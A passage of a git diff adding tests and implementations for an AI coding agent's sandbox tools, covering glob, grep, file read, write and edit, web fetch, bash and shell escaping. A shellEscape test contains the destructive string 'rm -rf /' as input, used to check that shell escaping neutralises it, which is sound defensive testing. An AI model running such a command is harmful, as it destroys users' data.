+    expect(result.success).toBe(true);
+    expect(result.count).toBe(2);
+    expect(result.files[0]?.path).toBe("src/index.ts");
+    expect(result.files[0]?.size).toBe(512);
+    expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO
+  });
+
+  it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never);
+    const cmd = sb.exec.mock.calls[0]?.[0] as string;
+    expect(cmd).not.toContain("-maxdepth");
+  });
+
+  it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    await tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never);
+    expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/);
+  });
+
+  it("returns success:false on non-1 exit codes", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "err",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    const result = (await tool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/exit 2/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts
new file mode 100644
index 000000000..e3545f501
--- /dev/null
+++ b/lib/agent/tools/__tests__/grepTool.test.ts
@@ -0,0 +1,103 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("grepTool", () => {
+  it("parses `file:line:content` output into structured matches", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42:  login();\n/sandbox/mono/src/b.ts:7:login()",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "login", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      matches: Array<{ file: string; line: number; content: string }>;
+      filesWithMatches: number;
+    };
+    expect(result.success).toBe(true);
+    expect(result.matches).toHaveLength(3);
+    expect(result.matches[0]).toEqual({
+      file: "src/a.ts",
+      line: 5,
+      content: "export function login() {",
+    });
+    expect(result.filesWithMatches).toBe(2);
+  });
+
+  it("treats exit code 1 (no matches) as success:true with empty matches", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 1,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "nothing", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; matchCount: number };
+    expect(result.success).toBe(true);
+    expect(result.matchCount).toBe(0);
+  });
+
+  it("returns success:false for real grep errors (non-1 exit)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "",
+        stderr: "grep: invalid regex",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    const result = (await tool.execute!({ pattern: "[", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/invalid regex/);
+  });
+
+  it("passes -i for caseSensitive:false", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = grepTool;
+    await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, {
+      experimental_context: ctx,
+    } as never);
+    expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i ");
+  });
+});
diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts
new file mode 100644
index 000000000..6d1d27fa3
--- /dev/null
+++ b/lib/agent/tools/__tests__/readFileTool.test.ts
@@ -0,0 +1,89 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(over: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    stat: vi.fn(),
+    readFile: vi.fn(),
+    ...over,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("readFileTool", () => {
+  it("reads a file and returns numbered lines", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "README.md" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; content: string; totalLines: number; path: string };
+    expect(result.success).toBe(true);
+    expect(result.totalLines).toBe(3);
+    expect(result.content).toBe("1: line one\n2: line two\n3: line three");
+    expect(result.path).toBe("README.md");
+  });
+
+  it("honors offset + limit (1-indexed)", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, {
+      experimental_context: ctx,
+    } as never)) as { content: string; startLine: number; endLine: number };
+    expect(result.startLine).toBe(2);
+    // `endLine` is the last line included (1-indexed). With offset=2,limit=2
+    // we read lines 2 + 3 of a 5-line file, so endLine=3.
+    expect(result.endLine).toBe(3);
+    expect(result.content).toBe("2: b\n3: c");
+  });
+
+  it("rejects directories", async () => {
+    const sb = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/directory/i);
+  });
+
+  it("returns success:false with an error string on stat/readFile failure", async () => {
+    const sb = makeSandbox({
+      stat: vi.fn().mockRejectedValue(new Error("not found")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = readFileTool;
+    const result = (await tool.execute!({ filePath: "missing.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/not found/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts
new file mode 100644
index 000000000..699605129
--- /dev/null
+++ b/lib/agent/tools/__tests__/shellEscape.test.ts
@@ -0,0 +1,20 @@
+import { describe, it, expect } from "vitest";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+describe("shellEscape", () => {
+  it("wraps a plain string in single quotes", () => {
+    expect(shellEscape("hello")).toBe("'hello'");
+  });
+
+  it("escapes embedded single quotes via the standard ' → '\\'' dance", () => {
+    expect(shellEscape("it's")).toBe("'it'\\''s'");
+  });
+
+  it("handles strings with shell metacharacters unchanged inside single quotes", () => {
+    expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'");
+  });
+
+  it("returns just '' for the empty string", () => {
+    expect(shellEscape("")).toBe("''");
+  });
+});
diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts
new file mode 100644
index 000000000..e862f7276
--- /dev/null
+++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts
@@ -0,0 +1,29 @@
+import { describe, it, expect } from "vitest";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const WORKDIR = "/sandbox/mono";
+
+describe("toDisplayPath", () => {
+  it("strips the workingDirectory prefix when the file is inside", () => {
+    expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts");
+  });
+
+  it("returns `.` for the workingDirectory itself", () => {
+    expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe(".");
+  });
+
+  it("keeps an absolute path when it's outside the working directory", () => {
+    expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts");
+  });
+
+  it("resolves a relative input against the working directory", () => {
+    expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx");
+  });
+
+  it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => {
+    // path.resolve on POSIX leaves backslashes inside the segment; the
+    // helper should still emit forward slashes for paths it keeps absolute.
+    const result = toDisplayPath("/tmp/win\\path", WORKDIR);
+    expect(result.includes("\\")).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts
new file mode 100644
index 000000000..7b5d88c9e
--- /dev/null
+++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts
@@ -0,0 +1,28 @@
+import { describe, it, expect } from "vitest";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+
+describe("todoWriteTool", () => {
+  it("echoes the todos back with a count message", async () => {
+    const todos = [
+      { id: "1", content: "ls the workspace", status: "in_progress" as const },
+      { id: "2", content: "summarize what we found", status: "pending" as const },
+    ];
+    const result = (await todoWriteTool.execute!({ todos }, {} as never)) as {
+      success: boolean;
+      message: string;
+      todos: typeof todos;
+    };
+    expect(result.success).toBe(true);
+    expect(result.message).toBe("Updated task list with 2 items");
+    expect(result.todos).toEqual(todos);
+  });
+
+  it("accepts an empty list", async () => {
+    const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as {
+      success: boolean;
+      message: string;
+    };
+    expect(result.success).toBe(true);
+    expect(result.message).toBe("Updated task list with 0 items");
+  });
+});
diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts
new file mode 100644
index 000000000..47fb75c92
--- /dev/null
+++ b/lib/agent/tools/__tests__/webFetchTool.test.ts
@@ -0,0 +1,96 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("webFetchTool", () => {
+  it("parses body + trailing status code on success", async () => {
+    // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract).
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: '{"ok":true}\n200',
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; status: number; body: string; truncated: boolean };
+    expect(result).toEqual({
+      success: true,
+      status: 200,
+      body: '{"ok":true}',
+      truncated: false,
+    });
+  });
+
+  it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 23,
+        stdout: "huge body fragment\n200",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; truncated: boolean };
+    expect(result.success).toBe(true);
+    expect(result.truncated).toBe(true);
+  });
+
+  it("returns success:false on non-0, non-23 curl exit", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 7,
+        stdout: "",
+        stderr: "Failed to connect",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Failed to connect/);
+  });
+
+  it("passes the request body for POST", async () => {
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "ok\n201",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    await webFetchTool.execute!(
+      { url: "https://example.com/api", method: "POST", body: '{"x":1}' },
+      { experimental_context: ctx } as never,
+    );
+    const cmd = sb.exec.mock.calls[0]?.[0] as string;
+    expect(cmd).toContain("-X POST");
+    expect(cmd).toContain("-d '{\"x\":1}'");
+  });
+});
diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts
new file mode 100644
index 000000000..3656a777c
--- /dev/null
+++ b/lib/agent/tools/__tests__/writeFileTool.test.ts
@@ -0,0 +1,52 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(over: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    mkdir: vi.fn().mockResolvedValue(undefined),
+    writeFile: vi.fn().mockResolvedValue(undefined),
+    stat: vi
+      .fn()
+      .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }),
+    ...over,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("writeFileTool", () => {
+  it("creates parent dirs and writes content via sandbox.writeFile", async () => {
+    const sb = makeSandbox();
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = writeFileTool;
+    const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; path: string; bytesWritten: number };
+    expect(result.success).toBe(true);
+    expect(result.path).toBe("src/index.ts");
+    expect(result.bytesWritten).toBe(42);
+    expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true });
+    expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8");
+  });
+
+  it("returns success:false on sandbox failure", async () => {
+    const sb = makeSandbox({
+      writeFile: vi.fn().mockRejectedValue(new Error("EACCES")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = writeFileTool;
+    const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/EACCES/);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
index 908113812..479a608db 100644
--- a/lib/agent/tools/bashTool.ts
+++ b/lib/agent/tools/bashTool.ts
@@ -21,9 +21,9 @@ const bashInputSchema = z.object({
 });
 
 /**
- * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
- * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
- * working directory.
+ * `bash` sandbox tool. Runs `bash -c "<command>"` inside the agent's
+ * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working
+ * directory.
  *
  * Approval gating is intentionally absent — model-issued commands are
  * trusted in this PR. Add a host-side gate at the route/UI layer if that
@@ -34,9 +34,8 @@ const bashInputSchema = z.object({
  * the right org. Detached execs deliberately skip env injection — those
  * processes outlive the prompt.
  */
-export const bashTool = () =>
-  tool({
-    description: `Execute a bash command in the user's shell (non-interactive).
+export const bashTool = tool({
+  description: `Execute a bash command in the user's shell (non-interactive).
 
 WHEN TO USE:
 - Running existing project commands (build, test, lint, typecheck)
@@ -61,56 +60,56 @@ IMPORTANT:
 - Never use interactive commands (vim, nano, top, bash, ssh, etc.)
 - Always quote file paths that may contain spaces
 - Use detached: true to start dev servers / long-running processes in the background`,
-    inputSchema: bashInputSchema,
-    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
-      const sandbox = await getSandbox(experimental_context, "bash");
-      const workingDirectory = sandbox.workingDirectory;
-      const workingDir = cwd
-        ? path.isAbsolute(cwd)
-          ? cwd
-          : path.resolve(workingDirectory, cwd)
-        : workingDirectory;
+  inputSchema: bashInputSchema,
+  execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+    const sandbox = await getSandbox(experimental_context, "bash");
+    const workingDirectory = sandbox.workingDirectory;
+    const workingDir = cwd
+      ? path.isAbsolute(cwd)
+        ? cwd
+        : path.resolve(workingDirectory, cwd)
+      : workingDirectory;
 
-      if (detached) {
-        if (!sandbox.execDetached) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr:
-              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
-          };
-        }
-        try {
-          const { commandId } = await sandbox.execDetached(command, workingDir);
-          return {
-            success: true,
-            exitCode: null,
-            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
-            stderr: "",
-          };
-        } catch (error) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr: error instanceof Error ? error.message : String(error),
-          };
-        }
+    if (detached) {
+      if (!sandbox.execDetached) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr:
+            "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+        };
       }
+      try {
+        const { commandId } = await sandbox.execDetached(command, workingDir);
+        return {
+          success: true,
+          exitCode: null,
+          stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+          stderr: "",
+        };
+      } catch (error) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr: error instanceof Error ? error.message : String(error),
+        };
+      }
+    }
 
-      const recoupEnv = buildRecoupExecEnv(experimental_context);
-      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
-        signal: abortSignal,
-        ...(recoupEnv ? { env: recoupEnv } : {}),
-      });
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+    const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+      signal: abortSignal,
+      ...(recoupEnv ? { env: recoupEnv } : {}),
+    });
 
-      return {
-        success: result.success,
-        exitCode: result.exitCode,
-        stdout: result.stdout,
-        stderr: result.stderr,
-        ...(result.truncated && { truncated: true }),
-      };
-    },
-  });
+    return {
+      success: result.success,
+      exitCode: result.exitCode,
+      stdout: result.stdout,
+      stderr: result.stderr,
+      ...(result.truncated && { truncated: true }),
+    };
+  },
+});
diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts
new file mode 100644
index 000000000..d8274c0bc
--- /dev/null
+++ b/lib/agent/tools/editFileTool.ts
@@ -0,0 +1,100 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const editInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"),
+  oldString: z.string().describe("The exact text to replace"),
+  newString: z.string().describe("The text to replace it with (must differ from oldString)"),
+  replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"),
+  startLine: z
+    .number()
+    .optional()
+    .describe("Line number where oldString starts (for diff display)"),
+});
+
+/**
+ * `edit` — exact-string replacement inside a sandboxed file. Requires the
+ * model to have already read the file so it can produce a unique
+ * `oldString`. Rejects ambiguous matches unless `replaceAll` is set.
+ */
+export const editFileTool = tool({
+  description: `Perform exact string replacement in a file.
+
+WHEN TO USE:
+- Making small, precise edits to an existing file you have already read
+- Renaming a variable or identifier consistently within a single file
+- Changing a specific block of code or configuration exactly as seen in the read output
+
+WHEN NOT TO USE:
+- Creating new files (use writeFileTool instead)
+- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool)
+
+USAGE:
+- Use workspace-relative file paths (e.g., "src/auth.ts")
+- You must read the file first with readFileTool in this conversation
+- Provide oldString as the EXACT text to replace, including whitespace and indentation
+- By default, oldString must be UNIQUE in the file; otherwise the edit will fail
+- Use replaceAll: true to change ALL occurrences (e.g., for a rename)
+- ALWAYS provide startLine when known: the line number where oldString begins
+
+IMPORTANT:
+- Preserve exact indentation and spacing from the file's content as returned by readFileTool
+- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString
+- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`,
+  inputSchema: editInputSchema,
+  execute: async (
+    { filePath, oldString, newString, replaceAll = false },
+    { experimental_context },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "edit");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      if (oldString === newString) {
+        return { success: false, error: "oldString and newString must be different" };
+      }
+
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+
+      if (!content.includes(oldString)) {
+        return {
+          success: false,
+          error: "oldString not found in file",
+          hint: "Make sure to match exact whitespace and indentation",
+        };
+      }
+
+      const occurrences = content.split(oldString).length - 1;
+      if (occurrences > 1 && !replaceAll) {
+        return {
+          success: false,
+          error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`,
+        };
+      }
+
+      const matchIndex = content.indexOf(oldString);
+      const startLine = content.slice(0, matchIndex).split("\n").length;
+      const newContent = replaceAll
+        ? content.replaceAll(oldString, newString)
+        : content.replace(oldString, newString);
+
+      await sandbox.writeFile(absolutePath, newContent, "utf-8");
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        replacements: replaceAll ? occurrences : 1,
+        startLine,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to edit file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts
new file mode 100644
index 000000000..d1de234d2
--- /dev/null
+++ b/lib/agent/tools/globTool.ts
@@ -0,0 +1,165 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface FileInfo {
+  path: string;
+  size: number;
+  modifiedAt: number;
+}
+
+const globInputSchema = z.object({
+  pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"),
+  path: z
+    .string()
+    .optional()
+    .describe("Workspace-relative base directory to search from (e.g., src)"),
+  limit: z.number().optional().describe("Maximum number of results. Default: 100"),
+});
+
+const GLOB_TIMEOUT_MS = 30_000;
+const DEFAULT_LIMIT = 100;
+
+/**
+ * `glob` — find files matching a glob pattern, sorted by mtime (newest
+ * first). Skips hidden files and `node_modules`. Uses `find -printf` on
+ * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find.
+ */
+export const globTool = tool({
+  description: `Find files matching a glob pattern.
+
+WHEN TO USE:
+- Locating files by extension or naming pattern (e.g., all *.test.ts files)
+- Discovering where components, migrations, or configs live
+- Getting a quick list of recently modified files of a given type
+
+WHEN NOT TO USE:
+- Searching inside file contents (use grepTool instead)
+- Reading file contents (use readFileTool instead)
+
+USAGE:
+- Supports patterns like "**/*.ts", "src/**/*.js", "*.json"
+- Returns FILES (not directories) sorted by modification time (newest first)
+- Skips hidden files (names starting with ".") and node_modules
+- If path is omitted, the current working directory is used as the base
+- Use workspace-relative paths when setting path
+- Results are limited by the limit parameter (default: 100)
+
+IMPORTANT:
+- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support
+- Use this to narrow down candidate files before calling readFileTool or grepTool`,
+  inputSchema: globInputSchema,
+  execute: async (
+    { pattern, path: basePath, limit = DEFAULT_LIMIT },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "glob");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      let searchDir: string;
+      if (basePath) {
+        searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath);
+      } else {
+        searchDir = workingDirectory;
+      }
+
+      // Extract file-name pattern (last segment) + literal directory prefix
+      // (segments before any wildcards) so we can constrain `find -maxdepth`.
+      const patternParts = pattern.split("/").filter(Boolean);
+      const namePattern = patternParts[patternParts.length - 1] ?? "*";
+      const literalPrefix: string[] = [];
+      for (let i = 0; i < patternParts.length - 1; i++) {
+        const part = patternParts[i]!;
+        if (part.includes("*") || part.includes("?") || part.includes("[")) break;
+        literalPrefix.push(part);
+      }
+      if (literalPrefix.length > 0) {
+        searchDir = path.join(searchDir, ...literalPrefix);
+      }
+
+      const remainingDirSegments = patternParts.slice(
+        literalPrefix.length,
+        patternParts.length - 1,
+      );
+      const hasRecursiveWildcard =
+        remainingDirSegments.some(s => s === "**") || namePattern === "**";
+
+      let maxDepth: number | undefined;
+      if (!hasRecursiveWildcard) {
+        maxDepth = remainingDirSegments.length + 1;
+      }
+
+      const findArgs: string[] = ["find", shellEscape(searchDir)];
+      if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth));
+      findArgs.push(
+        "-not",
+        "-path",
+        "'*/.*'",
+        "-not",
+        "-path",
+        "'*/node_modules/*'",
+        "-type",
+        "f",
+        "-name",
+        shellEscape(namePattern),
+      );
+
+      // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility.
+      const findBase = findArgs.join(" ");
+      const command = [
+        `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`,
+        `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`,
+        `| sort -t$'\\t' -k1 -rn | head -n ${limit}`,
+      ].join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // find may exit 1 on permission errors but still produce valid output.
+      if (!result.success && result.exitCode !== 1) {
+        return {
+          success: false,
+          error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`,
+        };
+      }
+
+      const files: FileInfo[] = [];
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        const firstTab = line.indexOf("\t");
+        if (firstTab === -1) continue;
+        const secondTab = line.indexOf("\t", firstTab + 1);
+        if (secondTab === -1) continue;
+        const mtimeSeconds = parseFloat(line.slice(0, firstTab));
+        const size = parseInt(line.slice(firstTab + 1, secondTab), 10);
+        const filePath = line.slice(secondTab + 1);
+        if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue;
+        files.push({
+          path: toDisplayPath(filePath, workingDirectory),
+          size,
+          modifiedAt: mtimeSeconds * 1000,
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        baseDir: toDisplayPath(searchDir, workingDirectory),
+        count: files.length,
+        files: files.map(f => ({
+          path: f.path,
+          size: f.size,
+          modifiedAt: new Date(f.modifiedAt).toISOString(),
+        })),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Glob failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts
new file mode 100644
index 000000000..f172f61af
--- /dev/null
+++ b/lib/agent/tools/grepTool.ts
@@ -0,0 +1,143 @@
+import { tool } from "ai";
+import { z } from "zod";
